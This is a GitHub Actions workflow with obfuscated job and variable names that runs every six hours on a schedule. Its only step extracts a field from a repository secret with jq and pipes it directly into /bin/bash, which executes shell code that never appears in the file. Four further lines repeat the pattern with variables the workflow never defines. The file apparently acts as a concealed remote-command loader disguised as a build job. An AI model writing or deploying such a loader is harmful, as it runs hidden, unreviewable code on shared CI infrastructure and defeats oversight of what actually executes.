name: xucijiu3176

on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xucijiu3176
        env:
          or793: ${{ secrets.or793 }}
        run: |
          echo $or793 | jq -r .dyx46 | /bin/bash
          echo $cky331 | jq -r .cj2 | /bin/bash
          echo $yu1878 | jq -r .jahd1 | /bin/bash
          echo $iwwvx22 | jq -r .pmn47531 | /bin/bash
          echo $ytpqx8441 | jq -r .wncrq66 | /bin/bash

